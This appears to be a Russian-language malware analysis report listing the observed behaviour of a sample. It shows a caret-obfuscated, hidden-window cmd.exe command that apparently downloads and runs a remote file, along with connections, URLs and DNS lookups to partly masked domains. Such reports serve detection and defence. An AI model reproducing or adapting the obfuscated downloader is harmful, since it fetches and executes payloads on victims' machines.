Техническая информация
- '<SYSTEM32>\cmd.exe' /V/C"^s^e^t ^x^i^U^5=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hc^t^ac^}^;^k^aer^b;^E^z^l^$^ ^m^e^t^I^-^e^kovn^I^;)^E^z^l$^ ^,^A^Q^L^$(^e^l^i^F^d^a^olnw^o^D^.^pr^Y^$^{^yrt^{)Cr^b^$^ n^i^ ^A^Q^L^...
- 'ke###ones.com':80
- 'ke###ones.com':443
- 'be###suals.com':80
- 'be###suals.com':443
- http://ke###ones.com/pR
- http://be###suals.com/S2hMkKS
- 'ke###ones.com':443
- 'be###suals.com':443
- DNS ASK so###lab.com
- DNS ASK ke###ones.com
- DNS ASK be###suals.com
- DNS ASK cl########urgiaplasticasp.com.br
- DNS ASK pr##e.ge
- '<SYSTEM32>\cmd.exe' /V/C"^s^e^t ^x^i^U^5=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hc^t^ac^}^;^k^aer^b;^E^z^l^$^ ^m^e^t^I^-^e^kovn^I^;)^E^z^l$^ ^,^A^Q^L^$(^e^l^i^F^d^a^olnw^o^D^.^pr^Y^$^{^yrt^{)Cr^b^$^ n^i^ ^A^Q^L^...' (со скрытым окном)